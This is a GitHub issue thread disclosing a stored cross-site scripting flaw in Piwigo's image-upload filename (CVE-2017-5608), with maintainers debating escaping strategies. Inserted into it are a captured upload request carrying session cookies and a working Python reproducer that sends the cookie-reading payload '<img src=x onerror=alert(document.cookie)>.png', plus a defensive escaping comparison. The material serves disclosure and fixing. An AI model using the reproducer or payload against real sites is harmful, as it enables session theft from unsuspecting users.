
Cross Site Scripting in image upload. #600

Closed
boogyman2 opened this issue Jan 4, 2017 · 13 comments

Comments

@boogyman2

The latest version of Piwigo is vulnerable to a cross-site scripting vulnerability in the image upload function.
The filename of the image can be crafted with a malicious payload, which in turn executes while viewing the image.


HTTP REQUEST:

POST /piwigo2/piwigo2/ws.php?method=pwg.images.upload&format=json HTTP/1.1
Host: x.x.x.x:xxxx
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://x.x.x.x:xxxx/piwigo2/piwigo2/admin.php?page=photos_add
Content-Length: 437474
Content-Type: multipart/form-data; boundary=---------------------------2133695097524014491600710750
Cookie: pwg_id=5bcim9rvd29i0grbe3qqg4qlk4; PHPSESSID=8e7766b7fc68cc81ee8cb8858dba1b1e; cid=1; wordpress_logged_in_8812ad623e46a1e5ebc36bb4a144d4be=admin%7C1484115709%7CSYNChB5ZsITQYFlPiW5bspgix97gGEwr05932gvtGtp%7Cda8b8a3479779d07c9d1759a52b8e52a7168da7170b66a093ff5ea93a09ec453
Connection: close

-----------------------------2133695097524014491600710750
Content-Disposition: form-data; name="name"

test
-----------------------------2133695097524014491600710750
Content-Disposition: form-data; name="chunk"

0
-----------------------------2133695097524014491600710750
Content-Disposition: form-data; name="chunks"

1
-----------------------------2133695097524014491600710750
Content-Disposition: form-data; name="category"

1
-----------------------------2133695097524014491600710750
Content-Disposition: form-data; name="level"

0
-----------------------------2133695097524014491600710750
Content-Disposition: form-data; name="pwg_token"

d0cc011709eb9b873188071ab872ebe7
-----------------------------2133695097524014491600710750
Content-Disposition: form-data; name="file"; filename="payloadhere.png"
Content-Type: image/png

Malicious script can be passed in the payloadhere section
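
As an added example (not the reporter's or the Piwigo project's code), the following Python rebuilds the captured request's multipart body with a constructed filename payload and a valid 1x1 PNG, so the report can be reproduced against a test instance. The base URL path, the session cookie and the pwg_token are assumptions supplied by the operator; the captured request shows they come from an authenticated admin session (note the admin.php Referer and the pwg_token field). The `send_upload` helper and the `XSS_FILENAME` value are mine, not a Piwigo API.

```python
"""Reproducer harness for the filename-based XSS report above.

Added example, not code from the Piwigo project or the reporter. It
rebuilds the multipart body of the captured pwg.images.upload request
with a constructed filename payload. Assumptions: base URL, session
cookie and pwg_token are supplied by the operator.
"""
import http.client
import secrets
import struct
import zlib
from urllib.parse import urlsplit

# Constructed payload: a filename that becomes an <img> with an event
# handler if any page echoes it into HTML without escaping. It avoids
# '"' and CR/LF, which would break the multipart header itself.
XSS_FILENAME = "<img src=x onerror=alert(document.cookie)>.png"


def _png_chunk(tag: bytes, data: bytes) -> bytes:
    """Length + tag + data + CRC32(tag + data), per the PNG spec."""
    crc = zlib.crc32(tag + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + tag + data + struct.pack(">I", crc)


def minimal_png() -> bytes:
    """A valid 1x1 8-bit RGB PNG so server-side image sniffing accepts the upload."""
    signature = b"\x89PNG\r\n\x1a\n"
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, depth 8, colour type RGB
    scanline = b"\x00" + b"\xff\x00\x00"                  # filter byte + one red pixel
    return (signature
            + _png_chunk(b"IHDR", ihdr)
            + _png_chunk(b"IDAT", zlib.compress(scanline))
            + _png_chunk(b"IEND", b""))


def build_multipart(fields, file_field, filename, file_bytes,
                    content_type="image/png", boundary=None):
    """Return (boundary, body) mirroring the captured request's layout."""
    if any(c in filename for c in '"\r\n'):
        raise ValueError("filename would corrupt the Content-Disposition header")
    boundary = boundary or "----------------------------" + secrets.token_hex(14)
    parts = []
    for name, value in fields.items():
        parts.append(
            (f"--{boundary}\r\n"
             f'Content-Disposition: form-data; name="{name}"\r\n\r\n'
             f"{value}\r\n").encode("utf-8")
        )
    parts.append(
        (f"--{boundary}\r\n"
         f'Content-Disposition: form-data; name="{file_field}"; filename="{filename}"\r\n'
         f"Content-Type: {content_type}\r\n\r\n").encode("utf-8")
        + file_bytes + b"\r\n"
    )
    parts.append(f"--{boundary}--\r\n".encode("utf-8"))
    return boundary, b"".join(parts)


def upload_form_fields(pwg_token, category=1):
    """The non-file fields seen in the captured request (one chunk of one)."""
    return {"name": "test", "chunk": 0, "chunks": 1,
            "category": category, "level": 0, "pwg_token": pwg_token}


def send_upload(base_url, cookie, pwg_token, filename=XSS_FILENAME, category=1):
    """POST the crafted upload to ws.php. base_url is e.g. http://host:port/piwigo (assumed path)."""
    u = urlsplit(base_url)
    boundary, body = build_multipart(upload_form_fields(pwg_token, category),
                                     "file", filename, minimal_png())
    conn_cls = http.client.HTTPSConnection if u.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(u.hostname, u.port)
    conn.request("POST", u.path.rstrip("/") + "/ws.php?method=pwg.images.upload&format=json",
                 body=body,
                 headers={"Content-Type": f"multipart/form-data; boundary={boundary}",
                          "Cookie": cookie,
                          "Content-Length": str(len(body))})
    resp = conn.getresponse()
    return resp.status, resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    import sys
    # usage: python repro.py http://host:port/piwigo "pwg_id=...; PHPSESSID=..." <pwg_token>
    status, text = send_upload(sys.argv[1], sys.argv[2], sys.argv[3])
    print(status, text)
```

The harness only proves the filename reaches the server unchanged; whether it fires depends on which page later echoes it, which is exactly the point the maintainers go on to discuss below.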

@plegall
Member

plegall commented Jan 4, 2017

Hi @boogyman2 can you please send me an email with more details? "plg" /at/ "piwigo.org"

@flop25
Member

flop25 commented Jan 4, 2017

Hello
I'm the one with the lowest skill here; so you need:
1- to be logged in as admin
2- to send a picture through a home-made POST request just like the one at admin.php?page=photos_add
3- but I don't get the final step

@boogyman2
Author

boogyman2 commented Jan 5, 2017

Hi @plegall, yeah sure, I'll put up a mail.
@plegall Mail sent, with details. Check it out.

@flop25
Member

flop25 commented Jan 12, 2017

up?

@boogyman2
Author

Hi @flop25, no response from @plegall yet; I had sent him an email explaining the vulnerability.

@boogyman2
Author

You up? @plegall

@plegall
Member

plegall commented Jan 27, 2017

I admit I don't really like to modify the original filename.

If you use the web upload form, you execute the JavaScript in the file name, but it is not "stored", so it's not a real problem.

plegall added a commit that referenced this issue Jan 27, 2017
@plegall plegall self-assigned this Jan 27, 2017
@plegall plegall added this to the 2.8.6 milestone Jan 27, 2017
@modus75
Contributor

modus75 commented Jan 27, 2017 via email

@boogyman2
Author

@plegall the XSS is a stored one. A victim viewing the image with the payload itself is necessary to infect him/her. What if an attacker uploads the crafted image and sends the victim the link? The suggestion by @modus75 is a good one to consider.

@plegall
Member

plegall commented Jan 27, 2017

"<" is valid in filename on Linux :-/ One thing really nice on the upload form, compared to FTP synchronization, is that you have no constraint on filename.

@boogyman2 The current solution, using htmlentities before registering in the database, prevents stored XSS.
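
To make concrete the trade-off plegall weighs in the two comments above (htmlentities before the database write, versus leaving the original filename untouched and escaping elsewhere), here is an added example in Python; it is not Piwigo's code. `html.escape` stands in for PHP's `htmlentities` (an approximation: it encodes only the five HTML-special characters, whereas htmlentities also encodes accented letters), the `<span>` markup is illustrative rather than a Piwigo template, and the `compare` helper is mine. It checks each strategy with an HTML parser and also shows the on-disk caveat that `<` is a legal character in a Linux filename, so a name escaped on store no longer equals the file's real name.

```python
"""Escape-on-store vs escape-on-output for an attacker-controlled filename.

Added example, not Piwigo code. html.escape() approximates PHP's
htmlentities() for the characters that matter here. The markup
fragments are illustrative, not Piwigo's templates.
"""
import html
import os
import tempfile
from html.parser import HTMLParser

# Constructed payload, same shape as the filename in the report above.
PAYLOAD = "<img src=x onerror=alert(document.cookie)>.png"


class _TagCollector(HTMLParser):
    """Records every start tag the parser creates from a markup fragment."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def tags_in(markup: str):
    p = _TagCollector()
    p.feed(markup)
    p.close()
    return p.tags


def render_raw(value: str) -> str:
    """Vulnerable pattern: whatever is in the DB is interpolated into HTML unchanged."""
    return f'<span class="filename">{value}</span>'


def store_escaped(filename: str) -> str:
    """The fix described in the thread: escape before the value reaches the DB."""
    return html.escape(filename, quote=True)


def render_escaped(value: str) -> str:
    """Alternative: keep the raw name in the DB and escape at output time."""
    return f'<span class="filename">{html.escape(value, quote=True)}</span>'


def has_script_capable_tag(markup: str) -> bool:
    """True if a tag other than our span appears, or any on* event attribute slipped in."""
    for tag, attrs in tags_in(markup):
        if tag != "span" or any(a.lower().startswith("on") for a in attrs):
            return True
    return False


def on_disk_lookup_matches(filename: str, stored: str):
    """Create the file under its raw name, then look it up by the stored (escaped) name.
    Returns None if the OS rejects '<' in a filename (e.g. Windows)."""
    with tempfile.TemporaryDirectory() as d:
        try:
            with open(os.path.join(d, filename), "wb") as f:
                f.write(b"\x89PNG")
        except OSError:
            return None
        return os.path.exists(os.path.join(d, stored))


def compare():
    stored = store_escaped(PAYLOAD)
    return {
        "raw_render_vulnerable": has_script_capable_tag(render_raw(PAYLOAD)),
        "escape_on_store_safe": not has_script_capable_tag(render_raw(stored)),
        "escape_on_output_safe": not has_script_capable_tag(render_escaped(PAYLOAD)),
        # If both layers escape, the page shows a literal "&lt;" (double escaping).
        "double_escaped": "&amp;lt;" in render_escaped(stored),
        # The DB value no longer names the file on disk.
        "disk_lookup_matches": on_disk_lookup_matches(PAYLOAD, stored),
    }


if __name__ == "__main__":
    for key, value in compare().items():
        print(f"{key}: {value}")
```

Both strategies neutralise the payload in this fragment; the difference is where the raw value survives. Escaping on store keeps every template safe without auditing them, at the cost of a DB value that no longer matches the file and that double-escapes in any template that already escapes; escaping on output keeps the data faithful but only protects the templates that actually do it.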

@plegall plegall reopened this Jan 27, 2017
@boogyman2
Author

@plegall okay pleg, I am not much of a development guy, so I'll leave the choice of the better solution to you :) . Can you grab me a CVE for this?

@plegall
Member

plegall commented Jan 27, 2017

Usually, the reporter gives us the CVE, not the opposite :-)

@boogyman2
Author

boogyman2 commented Jan 30, 2017

Use the CVE ID CVE-2017-5608.
